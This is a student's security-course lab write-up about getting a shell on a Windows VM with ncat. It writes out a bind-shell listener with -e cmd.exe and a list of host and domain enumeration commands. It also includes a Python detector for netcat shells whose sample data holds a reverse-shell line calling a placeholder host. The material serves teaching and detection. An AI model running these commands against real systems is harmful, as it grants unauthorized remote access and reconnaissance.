SEC 110 Week 6 Lab - Caden-Gallup/TechJournal GitHub Wiki
Popping Shells Lab
What we did
In our lab today, we took the roles of two different individuals to obtain a shell on a remote system. We used ncat to get a shell on a Windows 10 virtual machine. The lab showed how an attacker obtains a shell and how the attacker can decide which port to use and open on the target's system. This works even if the victim is behind a firewall: the victim is tricked into opening a document or something else that connects back to the attacker's computer, giving the attacker a shell with access to their data.
Basic Commands Used
- ncat -l 8001 -e cmd.exe -v
  Explanation: This starts a listener on port 8001; when a client connects, ncat launches cmd.exe and attaches it to the connection. -v is verbose mode and lets you see what is happening.
- ncat X.X.X.X 8001
  Explanation: Connects to the target IP on port 8001 and receives the cmd.exe shell.
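From the defender's side, the listener above is easy to spot in a process listing: an ncat/nc process that both listens (-l) and hands out a command (-e cmd.exe). The following Python is an added example (not part of the lab or the ncat project) that tags such command lines; the sample lines are constructed to look like `wmic process get commandline` output, and the hypothetical tags bind-shell/reverse-shell/listener are my own.

```python
# Constructed sample of process command lines, shaped like the output of
# `wmic process get commandline` on the lab VM (sample data, not captured
# from a real host).
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\system32\svchost.exe -k netsvcs",
    r"ncat -l 8001 -e cmd.exe -v",
    r"C:\Tools\ncat.exe 203.0.113.5 4444 --exec cmd.exe",
    r"ncat -lv 9000",
    r"notepad.exe report.docx",
]

NETCAT_NAMES = {"ncat", "ncat.exe", "nc", "nc.exe"}
LISTEN_FLAGS = {"-l", "--listen"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}   # ncat's command-attaching options

def expand_flags(args):
    """Split bundled short options (-lv -> -l, -v); keep long options whole."""
    flags = set()
    for arg in args:
        if arg.startswith("--"):
            flags.add(arg.lower())
        elif arg.startswith("-") and len(arg) > 1:
            flags.update("-" + ch for ch in arg[1:].lower())
    return flags

def classify(cmdline):
    """Tag an ncat/nc command line, or return None for any other program."""
    argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return None
    flags = expand_flags(argv[1:])
    listens = bool(flags & LISTEN_FLAGS)
    execs = bool(flags & EXEC_FLAGS)
    if listens and execs:
        return "bind-shell"     # listener hands cmd.exe to whoever connects
    if execs:
        return "reverse-shell"  # outbound connection carrying a shell
    if listens:
        return "listener"       # open port with no command attached
    return "client"             # plain outbound connection, lowest priority

def scan(cmdlines):
    """Return [(cmdline, tag)] for every netcat-family process worth reviewing."""
    return [(c, classify(c)) for c in cmdlines if classify(c) not in (None, "client")]
```

Running `scan(SAMPLE_COMMAND_LINES)` flags the bind shell from the lab first; on a real host the same check would be fed from EDR or Sysmon process-creation telemetry rather than a one-off wmic query.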
Important Terms
- NMap - Network Mapper
- Shell - A command line interface that allows us to talk to a machine via a command prompt
- IP Address - A unique string of numbers that identifies a device on a network
Useful Commands in the Shell
- Get the list of local users - net users
- Enumerate other hosts - net view
- Enumerate users on the domain - net users /DOMAIN
- List running processes - tasklist
- List services and the processes hosting them - tasklist /svc
- Enumerate internal systems without special tools like Nmap - arp -a
- After getting IP addresses from arp -a, list processes on a remote host - tasklist /s IP_ADDRESS
- Get installed software versions - wmic product get name, version, installlocation
- Running process details - wmic process
- OS details - wmic os
- User account details - wmic useraccount
- Detailed host information - systeminfo